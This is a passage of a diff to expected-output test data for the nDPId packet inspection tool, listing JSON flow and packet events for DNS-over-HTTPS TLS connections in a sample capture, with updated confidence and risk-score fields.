qojYcETIPE8pYwv+pEogBkJ36XO7ISaByslei0uwlMTDGqahxFUG9xNqF2N+uBuGm3rP1N0De6EH72L31wAMHQLr+g\/Z6vH8L0t5ZBiVyHRYWFiBaqBS7sS5CL7XIwxWU5nT4+O0vg9\/RKsE8R\/V3oTcaEyuOxZPN2ld4OexQ1VlWcqVQyk2Twbmq7OKKuOtMkJEEelQzBbVDHxrvHpN4rIHzn\/9TLkc3K+Gw0IKsO0YEfzDLQOy1LPBOrUtSvkHpTT\/9tKCeQ5oeaxAcdxjrW8Ob6O3OfTjPur4i7Dr1vbtCqdprUT3YFFMRDZ26nuYQwhC4uKvrLCR3YBND9okLFnTd\/lUt6yGc2upOIbcXBXCyaL3ONPVCFw2rLhSE+P67Rrx0pQ\/PN3BUeVHTUY5OZL2UVofmKcp3kyCsJpqyPvgqtN6sEvjlAvawn31gSxqPJMO+J4TEIN4NsQHeQPoQbqZEwJ5dggsoNl6xy1PlfH8FxBn\/\/\/Lr2eBnvYK65olzMCuvQ8qYuGMLDeKU+eAivsl062ELuv+\/dM8uhg7Eno5vDfDKFHEJLzWRw5E8iFnEoRLS95ap\/irULTPgAA0QmZ5jn1YuEDktj\/0IeFc53AUQ0iqNqf8q3TqQngAAZUKBI7Sk44RP395w1L0Eyzfl4IxdNlReV035GNhrN\/DGIe5cd9OmCUDwyYWDZ5z1ksNzw8W+uzpiwBt55f0ZJkvLbFgiMA+gkUt4hT8f5WK5dSjcjsu1hL60eqoQvBa0lWD42dAL0xAVrNk06unSiy5OJX2WBK7Q7No9ybhYFoGzDI8ZzAHGp1Xz2h+but\/3A\/uToYXT+zhFlUes\/MlMz6r15CtQUfWQhXV2DbcqYzcNr7XtwvhWwQRBQjoyEwldiUNrV4kfA5BNVrLK+IAb34EZEEXlsaVEYZdfTSkwf5mFzUW8YEGENVFtWYgvqKiwzQRm4Hnu9"}
-00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385216,"flow_last_seen":946739385246,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1735,"flow_avg_l4_payload_len":867,"midstream":1,"ts_msec":946739385246,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385216,"flow_last_seen":946739385246,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1735,"flow_avg_l4_payload_len":867,"midstream":1,"ts_msec":946739385246,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 01870{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":946739385246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1102,"pkt_l4_len":1068,"ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAARA\/O1AADcGGYhoHABqCgAAAQG7mS5MYZkPsaogJVAYAEL3vQAAj+eEnaAC9OtjNn9ZDhuY0QkIU8Et3SozIjmeFN3jl5ynvaSd0TNRCmKpUZKf\/fvqVCNBLPVpc+a1\/34xSlEnpJggvfLX55X87U+wFE+Gr7WzyudHjYSOPmOcexDC2hRAzeXYq1TgqVwJwEh4MCpq5hwfPH3wEyqIpcTyPqNEKua3iGoGl0jDllgnOyDy6qMtoHeGHyOqCPa7ViWWNsuvANnFYfP4DWXgq8fcNnwinGDW24misysy6Sky1Qfcgf01K751PVkPm8BzlnUWtr7bdFh8y4G4SaM7Ac3Zldy8pQDT1EbhFcuRGdsZ0naorgHPYs0SmR0Y3t6UYCsF0YOkjsdAEbpFIfyrBCBlh4z7aJh9xKrg\/5jQsdBuWbO9f+feot414m65BkfEsJNZt6q0OhiZBadbjN3fS3WVyRW59gC6+MXzyIF5Wxx4OnO6rWDTIiTViNpHvl70VUj6EIp7jtN+701iQ9XIbvLRRNs1dMLQv4llg0va54eLOiI8Tefj84dHZQatLYpsLcK1X1xgMBQvJdmlFwbKncCrUOCkGSrsZ4LVBWhcaxKoO36xnPPDV8cinSkrG\/rQoYT4tiAfTIWSqbjcWcgucf0EZWFYbi9MDrGUzUcZr82zbUhnYlEj1+aY2lv2lSt5AqGSaUKeQRwioCypPc3dHt1C72aRiX4CCSBeRj4DN2l\/vJTlcaPiDNg7t6TPWllts+Co\/OdFgVAkJAl+HIZBjiQtPGdBZH0Q8WHs19m6ieXdVdu3SXksmcJ4OArDrkVebghoJZJUEvtdYdAu0CxG32Y7Bdxe9zNMbKMIjUZThhjnA7hE+UoUNNr4aUW73torTPDm\/PasISFjUH1CHoDvjfn0IYzqO2vVaat\/SFbmMFs6UfAByhfgtTIBdM4vlalC4vJ\/3gPNzVh1u1xqYYIU6wN60WQoEexxjHdAMBBR1w+y4czMCbyPxsYOQzTZedkx2ofb\/xA+Z+8rEmaj0xb8Fyln6Nq8bsbjlAzp8F+BPhhygJC1D1SpxfIjpLhJ5pR8cCPnmFuv4Wb6pCT3F\/xJW7qpcmMvdn7rOqlw0sLhKBRfOeheFxSJrKe9iavOuolDEItae4jRrh8cRuAabSIDs\/KL9d4qTkbOnc6ryMLcKUz4QDjr3QIMIHJiOX9+2DVL5+3CGc336xPBx67NPWns3pKxWZovEglaPedBeKa1Ay9zwVrpcshhz8ZViqEZyeGf3Bhnr9gYf6a2k+91KFhxPRsj3wr6DG1ZrNf\/1DpWp8C8Eic8yqmZ7eLKXZwe+Mz2GUUCbxCXRoPG9q7XWM+v0cWz5lxW0nXaPM0vHHCL7Iqhc5wjeX5d9z5lx39pQN3jzFWZB4SuiTobndYtfC9FvqzivwC8uagzgYQI8AhesQ=="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":946739389936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"ts_msec":946739389936,"pkt":"REREREREZmZmZmZmCABFAAFBc1lAAH4GKTYKAAABLUxxH8s8IPtar+ZR\/RI3kFAYAfZgWwAAFgMBARQBAAEQAwPDKTE3gtHe4YkRucyB7lgiewe8eRdkAeXi8xQ\/UXf8siCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALZG9oLnNlYnkuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgBTSef\/+Gs9funZgaOAKPCcHz5qP34E4cKsNkKCajyxU="}
-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01036{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02369{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":946739390265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z1AAC8G9+gtTHEfCgAAASD7yzz9EjeQWq\/nalAQAfntdQAAFgMDAHoCAAB2AwOTWCXgGAu71\/Yvi6NLTHUrXueot2ESWHeiaJfdHE5RUSCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7BMBAAAuACsAAgMEADMAJAAdACDWWloo6cinLldR+cnVD8kRD\/l0Q2+aXf\/fBY+S+WSMRRQDAwABARcDAwAkRhOnfgeD\/nNOoyXIFtppA82CTRb9QELrjIuZ4Sms6\/A\/wFXWFwMDDR5COUoGySb4hNNJ9UU6WNVu5EkkD6YuaPuXJ8CsVpFNJmnkrUN+8qnnRcWKvhiCSeJ8dFamc6FJiqYTi+y4vhj\/9CUzXrDpoIqCPPPJVzrO7TRKenUWLYob8NzsM\/dFIXxOJTiZrwtOg0PRbjHk1oNiocDmQfIuK+9XQjJXpmH6WXi1GuKS6BI\/Mhq7VeFosQzd4f6PedlOLyqUiLqOkZBu8shjDKqJBgT+asclbYKMS0So4WatuM12p1csrxpvTCnaj0btgSWvRlOtA5V89mkHs0RlWfRzITmJodp36A7TpRfkiq+5ADaJkK4PCqzM7n58+S7faojcjUVNv3TZMKR9X7THNbnF4RYlkXi+yQzERvi6AVU4qjl1T3oshQYm+0uXk6wZy\/EHFkS0kI4JdkMrhx\/QDyFE9JrZnCDaKSbgnVDXGxQ6JI3KX68rAnXlo16wEjgmYiB\/CpDOACPBUUmkRPrMxrIYGRVY5m4VHDtxxsBR+4pWd57JVtTXFf0dDyH1zJz6Z40Wrwh\/p6Qz5d2q3mQqk2qU0E2kn8++EZD8541s2A3AenqtWVuRk32zNIyJfY0yQnjyuK0juMCVOEjM4+TSdiFJcZE3rzM52S9F4fUWq+Qa6izwHy+3rJUcjKQaK3KU1ecorGHjAhe9fanpg8OhUEfZK30POLsPc9a0KJ8Bhzb\/xTp4iMokguZqwGUeiTSNyWJBScTyI9LLhhKpNOWbmn0FCwxaV5Mbt+mvTDDVs8cw9GaOZN49PQe6J7UFtKhXp+jLkt\/igfMPvVErRgHNbDWAx05yKKN5cVgAGz+obL+4ZX79sXQRNBQfrfR7W7COyUVVMPxrdFItZFJXlJ2qtiFtfv22UGoflFY2zoiK9sk9Zj+K1u+9Vmzjs+RITpDecu73geffdixXjb3urBW4FykkW7oiu0nkWHDQgL+KviHt9Tm0lU0Hzsi8YTo4OdVu\/QwCcmn\/9YMQoYmxguinCV0SqsmSoXYPpWKAlUH8vnANpkvHS7OU72AWRuphcFRa4RXp48xd9rXEW7d6pcKpL7UD\/qAcfrqs3Aq3OBcZjm\/9+CZ\/HA+ws2AIqrw+2oY4SiSGn\/cjxInZ1S7KChZFleUsKWilMt0S80n1UHIe0ozJo1YpV6O+256ILtDlEXLc4L\/\/W\/Y\/61lq\/\/f9IHao9y20WHTGbxQOKX1rXuMjgZIEMZvVKqcKW+vUa6jVq0bpPfVryu2fyy6bH4O8lkPOuhDeO5FxfnatEMjgu7F6t\/PeACLHie\/Eg2ezTBDOdT85sb1vFD3nB3c3wl9xSQGoUXMREa3dlU4yyKTsRvhF5IVHX+WZrnZEXNIyBa2yqUn\/9nlC+Nlg+hPHBSdvrZNSMA+riMftxpQlj6FTL7EYx8bKMIfPYnyZddeZmxpXN9XqWLs7KrnqynK9ZMJhVvaIAMfyuBU2fqyPpflnNhs96RaJ+FGM\/iw\/mZYOsIhH2JBIZKVlvkBCQxCbysphauFVIsTMYeZEcsoCjFB1qKXHuCceZxP4Jy7kiXMgSTdDFzzGYgYfCng1fFfHI7zfjdtWkPQ9HPe5f9egBljz+JDS6ehJP7PfY20bsjB73IKGpwaFJB2W5txeWuX9YJMSmwLmC9CvECSoWQlENl+g"}
-00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739389936,"flow_last_seen":946739390265,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":845,"midstream":1,"ts_msec":946739390265,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01077{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739389936,"flow_last_seen":946739390265,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":845,"midstream":1,"ts_msec":946739390265,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02356{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":946739390265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z5AAC8G9+ctTHEfCgAAASD7yzz9Ej0SWq\/nalAQAfnqiwAAu9LAVBlO+s0L+nkwU4YXcw1SOmlRl+XSnXuO6tKFQ694AGFrib2S2f3BX7B1582XtNQQL\/1IwqS9eCXYJzjdfbbKDKnkw+MRH36zeNfFmebdTa26VGWOgnZNECwEpmFBvEXSt2RPI6ofb1vE32eZrFh79Bpuwp1PCG2ngGNn3Z\/o1aRMv577hTiLGHUP3zlCYCAacHiSAEi\/LQgxJOLyR9jugiMcNQxMzI9B1anoxyifvPkh2BJiEbyAypQ1hQGudgFCLTi2Txkt7Eu\/NIUQoPpDLsdh3lHWxNLyLEP9wpzBgp6l3ilL84X1Mk7ZHQuPK\/Oz4yfrJd+G7Oo6i1yrQ\/Adp3qU8KnQ9ptwaIVLOtg8g5ENilAbdYS7Ka3cZHFz4gvVtmLddRHiTcXVf5C1ypTeGluZMusSnmJOjPWY5fp5RP99ayjRwQRdkg+IcNHiO31ps8qxZvYyOJZ7Fb87gLgZwV0IUvyDuDbizEwr2XSGbMEZuVoSHx9QyUP+A3BPmqRGGD9RWvZIaULosdFkVeC1hEiNEcM30Eo27GhCBEkpzGPbQ95LfK337HDa9UlKAktQhKwG8\/hAtMIbbv5Noetnx3T81i7FzhkyHH\/C6g3BkR97pP7xxNGSesRAej+0SV1z2Ux2yezANH89JV1k9OQdFbMalrjLnx8kanK4YG3Zfke83pATlf6RAPV3lPyNNDQQypoZkugKEUxOXS7Rx2XEo0segrTQp7Q+35xLorFirg\/3rbokzMw54\/alVY08gHsLJlNmadq9IZ0Hjxo7ykUIQsSRH59BS476g7Zzq0D6LzWm8dRwgOJiFmUme9r5za2XErhkjyFFtknvfbQcxGFpshYQjf44nBtFebBI6Th81Pz6P4vS1Ab5Ldbe5kqW2W6OFyHBCtpJQLdqxOC1y4j8o1zpDr\/5I6fMit0JvTc1WNaN6qBFlg1P6Gaatd4VK3xOWgpdV7lGy9Cs1aJIggG2JQikJ7xxWvncFI3YNX\/j7e31omXzttI+wKWBnq3libBpSCKXTzvdWZpJ16RDkXLbmBFLlruWHpbIZvg3vh187AjFKcBshFCVg\/9CKx0tdclgUGbHqJ7E6OtJIm4m4kox5tzQjCDUJNS29SjoWoK9anOoaXw7azu80JwAvB5wDC4mKG4pcolzPcWCdGzgc4j\/1wLg0a7\/6J83Mv9Vwe7sgJa0WfVmJh67OWIpAbZv84XgLPcLVo5yXd6\/yWWRMvn+kXy6mm6tMTinzOpwIpfSCVQtp3DNLsEUsIkV1DrWVNbTPvH5GCVkQ8p3Lo5BGZ2lF4qqWWh0bwR33Xc69aAXaHUgKcezVe1FfG3x1Q3qp0cn65Dxae+n\/hfZa1KqbpdsxY\/eLTfFV7m+HIJAbLFSSzH7PU\/MSQj8rvEXnuHMSR3htHNgcZRMLZGZNMcEgX88HYGJMITbgLbQ1nfRTwzL8m8XTnhZtErha6pHrFlPsZ1RNjcoqZKgLKdMg2ezfrI8Jq0lQFzAOf3F4VPbIGq1krTP43rpCLbzYETrqQH8Xz467NmG5PHVJ3Hne12KAqQma4zC6YHwFBTwWUunyHc7Z86uw6NV1GMEfe39uxIB1Th3Q3mEC1zo37vRQUYEr8R3n9WX5ZtJpDmxGTtrG8c0JVrUZpjFnqPj2Uj069ivRfFVD19zTIWIWwVZHNTkf54z1SZJ+bsWwla3CC3KyaPHGsTreYdevDYggE2Ww91a5tn8NCHUwyaWPcCmBikp3+fKDZwg0dx3gKVzU8Hf9Km4EdsDin7gSeY7n3yByLcyqnB3hOSBc1nuPCEOi+hB9GXpEuBRdmMhQLcAelRdGq2lZwOE87jAboVg7rc+WH1wOyzCb4UJFuzyaFs37Li8enr+"}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00837{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":946739390933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"ts_msec":946739390933,"pkt":"REREREREZmZmZmZmCABFAAFDddBAAH4G12cKAAAB2akUF4T0AbuSPuOKlASrClAYAfavsgAAFgMBARYBAAESAwMYXSzw+8AvMstO05PQ7qPBj27f4mGkG8QM9OU7ZRFcuCDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG5zLmFhLm5ldC51awAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAuLsKlIgLTs2y17K315yEyJxqnsCXfl0yS1kyaNKG0aQ=="}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":946739390967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3165,"pkt_l4_len":3131,"ts_msec":946739390967,"pkt":"ZmZmZmZmRERERERECABFAAxPNc5AADgGUl7ZqRQXCgAAAQG7hPSUBKsKkj7kpVAYAfW6vgAAFgMDAHoCAAB2AwNggvgT348vLVfztyje+nh951Uui2O3z\/vCGwcNEmcL7CDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4xMCAAAuACsAAgMEADMAJAAdACCYu4Q1ZjtZfYUrS3fwrroPQafz4tTgHn9jgiQX2w0NexQDAwABARcDAwAgr2vUeHfWinGo7k2fDAirV2y2+2vt58RojQUfF3ywprIXAwMKEF7v66Q95J7Madk2ZEcExfHDptRh16jabZXVGAjSu6ZVpQdW9tsq8WD0VxRfdaushrVbrrTRIk5I0CixRifCcooy6c56kGsUxb8wL+Z+QNmR5uWAeV9nzzlGQpBhNwq90IzHQbBwHdfR22cB\/o+gnP0zKhtFT5pdVatUFFMBXYFPBfgmW+yElY9JLYGDSC\/IIw728fBQlRPlTOPnC6Bd8HZeDEbFd7L\/8oeIRd34AfymHYlFpxJ8CjS4xP7I5o8GpeBcv96KPHtYZV5dsMuE75XBxooOpL9Gr9IWBy6AEdPGcU29oVVhWirzJ93HxYSeGAAYTfsu16+HrpOMUAzFMOyXwLKfIjR9Jx84Zvi3ytxvu8IPsZAmQB9iLco+v\/PYNz44XswLq2rQZtIH4a7\/SiljnI7OvMEtw+9+0ohSjEBjqZNpZ4+Di4Oi4uvLSj90PiJtsiIz50r+luuFIJLrHS\/Bx2ooWNGmf8wIpBNOEoC8uYmbQEc0M0F6MgPM2\/Dc1rxiGmLW966znBcYtqEPAIF5LP4HjDzAMEtUySTvYC8cLBRrZgX4sNAbkCcpNw4QFS6erQa8jKBVOZjyMqQVsAikZDL76qZyWnWAbrLmD+ESPhH+LiOjwj\/BVLLmuPIqP2HgrWrkMLok\/KHXuIbZn7C1n58rcMZq7V+5f3gEi6kXuPOTozMsLixf3wStDsNPpLZW5vF+Opg\/HPuTYMBM+b2VDW0oQ+mGR3v0lSfTyZb2sccxT0\/YFa2\/gZNRs9igar59HBmzwzWtwto1Lj2+tqjOzo9Vxzmqr0QO+5jA9knewsPjci1iEHsBRvkAHDUo8mzkBfWBM8t9UZZElcDeWIg7oO2uY349FEzTQzJrCGLOJ20pc10E+6FXsRSoQcdecc2pqUoNYisiO4BgvfGVRTx3PyLsE2LqpgS5+upDBiBuHq9GTnvPUwfjHUOVZfhEY9kzfkMm52CF0hrFbS1FqZu2k5xWd1RZ+YdcxocleEJLDXEEeCaF2XJug2p3sgxI8AQfg96H0lHo6\/ce7YWyFTSQ5214Zlm5R8arc+k+FFIGpKsd1JRZDuMs6lUG2OcuW4k6GmXOA9lL00+Pu1LlWECRAA38IcMLlvDeoyIVPF5RKHTFbtFfFeynrkfS57BDgpnUQsOLofW+MsR51VSL7z5rFWkT+0yA0OJ4P5J1dZjOVbRrnPj+lP8KBidjvuv\/+vQR9AYL2FUFonbuHYQ6NUOJSyw\/q3koSUCoI9nF1rL5SbnJpgQ9XzQ2ozstAI1DR6AAJPio22EFuEDMEoFVvE\/liE+8UHQnOZNeIN8tMqUAL+WlkvDEcrehWMNUpY287pebSO3eZPDe3egHiaBMZQIlL4jO1lfEjJdr5RXvT9Uv4MVNGGGXCQtr4IWIfMjPSJmmedmBdcxMuZnxTJ7jKLERRom+1LtykcTtbFMZ6nwh7KNIt58CGrTH3Bh+ClGWC6JtjiLbGXt